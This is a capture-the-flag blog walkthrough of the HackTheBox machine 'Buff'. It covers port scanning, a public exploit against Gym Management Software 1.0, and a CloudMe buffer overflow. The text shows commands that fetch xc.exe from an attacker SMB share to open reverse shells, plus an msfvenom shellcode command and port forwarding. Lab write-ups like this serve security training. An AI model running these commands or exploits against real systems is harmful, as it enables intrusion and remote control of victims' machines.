Buff @ HackTheBox

21Nov

Buff @ HackTheBox

By CTF , , ,

Buff is a 20-point Windows Machine on HackTheBox, created by egotisticalSW. It involves 2 simple public exploits and forwarding a port.

User

As usual we start with a portscan:

nmap -Pn -sV -sC buff.htb
...
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

When we visit the site in a browser we can see a fitness site. On contact it shows:

mrb3n's Bro Hut
Made using Gym Management Software 1.0

A quick google search shows this exploit, which gives us a shell as buff\shaun:

python exploit.py http://buff.htb:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload>

To leave this really inconvinient shell, we use smb to pull in and start a xc shell:

nc -lvp 1337
\\10.10.14.6\public\xc.exe 10.10.14.6 1337

Now we can read the user flag:

./xc -l -p 1337

        __  _____
        \ \/ / __|
        >  < (__
        /_/\_\___| by @xct_de
                   build: GLvLrMgcikmgHFyx

2020/11/21 11:13:53 Listening on :1337
2020/11/21 11:13:53 Waiting for connections...
2020/11/21 11:13:53 Connection from 10.10.10.198:49826
2020/11/21 11:13:53 Stream established
[xc]:type \users\shaun\desktop\*
464f8c6c1550f2d071d3e1702801fba5

Root

In Downloads we can find an usual binary:

[xc]:!shell
cd \users\shaun 
C:\Users\shaun>dir Downloads
...
16/06/2020  15:26        17,830,824 CloudMe_1112.exe

A quick google search shows various public buffer overflow exploits for this exact version. Running netstat -ano shows that the service is listening on localhost on the port the exploits mention:

netstat -ano | findstr 8888
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       8540

A quick side note: This was super unstable on release night and several people, including me, did not have this port even open.

I chose this exploit. We have to replace the shellcode though – an easy way to do it is via msfvenom:

msfvenom -f python -p windows/exec CMD='cmd.exe /c "\\10.10.14.6\public\xc.exe 10.10.14.6 1338"'

After replacing the shellcode, we use xc to forward the port 8888 back to us:

!lfwd 8888 localhost 8888

We then run the exploit and get a shell back as administrator:

./xc -l -p 1338
...
[xc]:whoami
buff\administrator
type \users\administrator\desktop\*
...
6204e76cfbd6001662e4ec757c09f59b

This box had many stability issues and running public exploits does not teach much, so I did not really like it.

Share this post

Author

Related Posts

30Mar

Curling @ HackTheBox

Curling is one of the easier boxes on hackthebox.eu, featuring getting a shell on joomla via template editing, getting a... read more

13Apr

LaCasaDePapel @ HackTheBox

LaCasaDePapel is a rather easy machine on hackthebox.eu, featuring the use of php reflection, creating and signing of client certificates... read more

16May

SwagShop @ HackTheBox

SwagShop is a very easy machine on hackthebox, involving a public exploit and sudo abuse. read more

14Apr

Kryptos @ HackTheBox

Kryptos is 50 points machine on hackthebox, involving some interesting techniques, like setting up a fake database and making the... read more

13Apr

RedCross @ HackTheBox

Redcross is a machine on hackthebox.eu, featuring sql injection, cookie reuse and a nice binary exploitation challenge, which I enjoyed... read more

27Mar

Luanne @ HackTheBox

Solving Luanne on HackTheBox. This is an easy 20-point machine involving a simple command injection and some password cracking. read more

11Jul

Book @ HackTheBox

Book is a 30-point Linux machine on HackTheBox. We log into a web application by exploiting SQL truncation and then... read more

27Aug

Resource-Based Constrained Delegation – Resourced @ PG-Practice

Video & additional notes for Resourced, an intermediate difficulty Windows machine on PG-Practice that involves password spraying and an RBCD... read more

28Mar

Helpline @ HackThebox

Helpline is a really fun box on hackthebox.eu, which I was lucky enough to get system first blood on :)... read more

21Aug

SQLi, ToC/ToU & Arbitrary File Write – Proper @ HackTheBox

We are solving Proper, a 40-point Windows machine on HackTheBox created by jkr and me. This box involves a custom... read more